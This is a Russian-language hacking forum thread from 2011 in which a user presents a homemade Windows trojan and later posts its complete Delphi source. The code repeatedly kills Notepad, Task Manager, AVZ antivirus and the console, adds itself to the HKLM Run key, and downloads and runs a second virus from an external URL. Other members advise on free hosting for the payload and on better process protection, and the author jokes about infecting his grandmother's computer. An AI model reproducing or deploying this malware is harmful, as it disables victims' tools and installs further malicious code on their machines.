|
Trojan.Win32.Link
|
|
| link993 | Дата: Вторник, 14.06.2011, 16:12 | Сообщение # 1 |
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского"  (если его конечно рассекретят).
После старта он делает следующее:
1. Отрубает и не дает включится следующим процессам:
1.) Блокнот (это так просто);
2.) Диспетчер задач ;
3.) Антивирусная утилита AVZ;
4.) Консоль;
2. Прописывается в реестр;
3. Скачивает вирус Dolphin,a HLLP v.2 (http://delfcode.ru/load/ost/vredonosy/hllp_v_2/14-1-0-447) с этой страницы форума и запускает его;
4. Прекращает свою работу(с закачкой), сидит в памяти и ждет пока его не высекут и не отправят в "Лабораторию Касперского" .
5. Создает ужасные глюки...
Если будете тестировать скачайте прогу чтобы убить процесс троянца. Почистите реестр после запуска по адресу hkey_local_machine\software\microsoft\windows\currentversion\run
Троян с формой, поэтому много весит. Прошу из-за этого сильно не критикуйте. Троян и вирус Вы можете скачать ниже. Если кому-то будет нужен исходник оставляйте просьбу в теме. Комментируйте.
Иконку сменю...
Тестировался на бабушкином компьютере )) После 10 минут мук бабушка сдалась и вызвала мастера...
Качайте файл link2-Trojan)))
Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:36 |
| |
| |
| gravitas | Дата: Вторник, 14.06.2011, 17:43 | Сообщение # 2 |
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (link993) Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского"
Гыы) "ПрЕвЕд" поди
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| link993 | Дата: Вторник, 14.06.2011, 18:30 | Сообщение # 3 |
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| gravitas, выкуп требую за сына Касперского
Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:30 |
| |
| |
| gravitas | Дата: Вторник, 14.06.2011, 20:04 | Сообщение # 4 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (link993) gravitas, выкуп требую за сына Касперского
Поймали уже похитителей то) Проактивка постаралась наверно
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| gravitas | Дата: Вторник, 14.06.2011, 20:08 | Сообщение # 5 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Есть способ наверняка:
Идешь на форум ЛК и создаешь там в определенном разделе топ. Мол аццкой вирь и т.д.) И линк им даешь.
Они конечно посмеются там основательно, но сообщение твое наверняка получат))
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| link993 | Дата: Вторник, 14.06.2011, 21:01 | Сообщение # 6 |
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Quote (gravitas) Поймали уже похитителей то) Проактивка постаралась наверно biggrin
НЕт,Ж они там антивирусом все население просканировали и нашли!
Как вообще троян? Обращятся на форум касперского с самописным трояном это всеравно, что обращатся в фбр с убийством сына касперского Извини, проблем с законом не хочу...
|
| |
| |
| XSPY | Дата: Среда, 15.06.2011, 10:07 | Сообщение # 7 |
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
| link993, в общем,неплохо.Но,я бы твой вирус не взял бы.Ну скажы-на кой хрен глюки компу?зачем ты зря тратишь процессорное время и ресурсы?
и второй момент-зачем блокнот отрубать?более 90% пользователей инета не смогут ничего твоему вирусу серьезного сделать,так как они не умеют кодить))
а так вроде ниче...
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
| |
| link993 | Дата: Среда, 15.06.2011, 10:47 | Сообщение # 8 |
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| XSPY, глюки идут уже после загрузки вируса, в блокноте можно написать бат скрипт, чтобы убить процесс))
|
| |
| |
| XSPY | Дата: Четверг, 16.06.2011, 22:36 | Сообщение # 9 |
|
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
| link993, блин,будто я не знаю когда глюк идёт!
Вот и спрашиваеться-нафига глючить комп?ето сразу палит твой вирус!
А бат скрипт рядовой пользователь не напишет,так как дальше "вконтакте" и одноклассников они не ходют.
Ето все ИМХО.
По сабжу: лучше сделай защиту процесса процессом.
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
| |
| link993 | Дата: Пятница, 17.06.2011, 13:15 | Сообщение # 10 |
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает.
|
| |
| |
| gravitas | Дата: Пятница, 17.06.2011, 15:07 | Сообщение # 11 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (link993) Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает.
Еще бы. Надо как бы авторизироваться сначала. Создай сайт на народе. На него вирь кинь. Так будет работать.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| dolphin | Дата: Пятница, 17.06.2011, 15:37 | Сообщение # 12 |
Администратор
Сообщений: 906
Статус: Offline
| Quote (gravitas) Создай сайт на народе. На него вирь кинь. Так будет работать.
Точно. Для него любой бесплатный хост подойдёт, народ проще всего и данных о себе много не нужно.
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| link993 | Дата: Пятница, 17.06.2011, 17:44 | Сообщение # 13 |
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| dolphin, gravitas, сПАСИБО)) СДЕЛАЮ)))
|
| |
| |
| Fedgrisha | Дата: Воскресенье, 26.06.2011, 00:35 | Сообщение # 14 |
Новичок
Зарегистрирован: 26.01.2011
Группа: Пользователи
Сообщений: 1
Статус: Offline
| дайте пожалуйста исходник его!очень нужно
заранее благодарен!!!!!!!!!
|
| |
| |
| link993 | Дата: Воскресенье, 26.06.2011, 10:42 | Сообщение # 15 |
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Вот на форме мемо только. Форм креат в цикле. Не злитест. Все объединил. Если убрать цыкл на скачку то глюков не будет.
Code unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,Registry,UrlMon,ShellApi ;
type
TForm1 = class(TForm)
mmo1: TMemo;
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.FormCreate(Sender: TObject);
const
URL = 'http://delfcode.ru/_fr/5/hllp.exe';
Filename = 'C:\program.exe';
var
reg: tregistry;
begin
while true do
begin
Sleep(5000);
winexec('taskkill /F /IM NOTEPAD.EXE', SW_HIDE);
winexec('taskkill /F /IM taskmgr.exe', SW_HIDE);
winexec('taskkill /F /IM setup.exe', SW_HIDE);
winexec('taskkill /F /IM avz.exe', SW_HIDE);
winexec('taskkill /F /IM cmd.exe', SW_HIDE);
if 0=0 then
begin
reg := tregistry.create;
reg.rootkey := hkey_local_machine;
reg.lazywrite := false;
reg.openkey('software\microsoft\windows\currentversion\run', false);
reg.writestring('ExTaZy', application.exename);
reg.closekey;
reg.free;
if 0=0 then
begin
if FileExists('C:\program.exe')
then
ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1)
else
URLDownloadToFile(nil, PChar(URL), PChar(Filename), 0, nil);
ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1);
end;
end;
end;
end;
end.
Это весь код
Сообщение отредактировал link993 - Воскресенье, 26.06.2011, 10:45 |
| |
| |
| XSPY | Дата: Воскресенье, 26.06.2011, 22:23 | Сообщение # 16 |
|
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
| link993, работает только под админом?
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
| |
| link993 | Дата: Понедельник, 27.06.2011, 09:31 | Сообщение # 17 |
|
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Не знаю. Не проверял. 
|
| |
| |
